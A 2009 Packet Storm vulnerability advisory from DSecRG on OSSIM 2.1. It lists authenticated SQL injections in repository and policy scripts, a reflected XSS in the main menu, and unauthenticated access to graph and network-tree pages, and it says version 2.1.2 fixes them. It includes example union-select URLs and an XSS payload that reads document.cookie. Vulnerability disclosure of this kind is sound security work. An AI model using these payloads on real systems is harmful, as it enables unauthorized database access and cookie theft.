OSSIM 2.1 SQL Injection / XSS

2009-09-24T00:00:00
ID PACKETSTORM:81588
Type packetstorm
Reporter Alexey Sintsov
Modified 2009-09-24T00:00:00

Description

                                        
                                            `OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.  
  
1. SQL Injections  
2. Linked XSS  
3. Unauthorized access  
  
  
  
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055  
  
  
Application: OSSIM  
Versions Affected: 2.1 and may be 2.1.1  
Vendor URL: http://ossim.net/  
Bug: SQL Injection,XSS, Unauthorized access  
Exploits: YES  
Reported: 07.09.2009  
Vendor response: 09.09.2009  
Solution: YES (version 2.1.2)  
Date of Public Advisory:21.09.2009  
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]  
  
Details  
*******  
  
1.1 SQL injections in repository  
  
Attacker need to be authorized in system for success.  
  
Vulnerable script - repository_document.php  
Vulnerable parameter - id_document  
  
Example  
*******  
  
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3  
union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1  
  
1.2 SQL injections in repository  
  
Attacker need to be authorized in system for success.  
  
Vulnerable script - repository_links.php  
Vulnerable parameter - id_document  
  
Example  
*******  
  
http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3  
union select 1,user(),3,4,5,6  
  
  
1.3 SQL injections in repository  
  
Attacker need to be authorized in system for success.  
  
Vulnerable script - repository_editdocument.php  
Vulnerable parameter - id_document  
  
Example  
*******  
  
http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3  
union select 1,user(),3,4,5,6  
  
  
  
1.4 SQL injection in policy scripts  
  
Attacker need to be authorized in system for success.  
  
Vulnerable script - getpolicy.php  
Vulnerable parameter - group  
  
  
Example  
*******  
  
http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1  
  
  
1.5 SQL injection in policy scripts  
  
Attacker need to be authorized in system for success.  
  
Vulnerable script - newhostgroupform.php  
Vulnerable parameter - name  
  
  
Example  
*******  
  
http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select  
user(),'b','c','d','f  
  
  
1.6 SQL injection in policy scripts  
  
Attacker need to be authorized in system for success.  
  
Vulnerable script - modifynetform.php  
Vulnerable parameter - name  
  
Example  
*******  
  
http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select  
user(),'b','c','d','e','f','g','h','a  
  
  
And others scripts in policy menu.  
  
  
2. Linked XSS in main menu  
  
Vulnerable script /ossim/  
Vulnerable parameter - option  
  
Example  
*******  
  
http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="  
  
3. Access to data without authentication.  
  
Unauthorized user can see graphs and infrastructure  
  
  
Example  
*******  
  
Access to the graph:  
http://OSSIM-SERVER/ossim/graphs/alarms_events.php  
  
Internal infrastructure view:  
http://OSSIM-SERVER/ossim/host/draw_tree.php  
  
  
  
  
Fix Information  
***************  
  
Upgrade to version 2.1.2  
  
  
  
About  
*****  
  
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsecrg [dot] com  
http://www.dsecrg.com   
`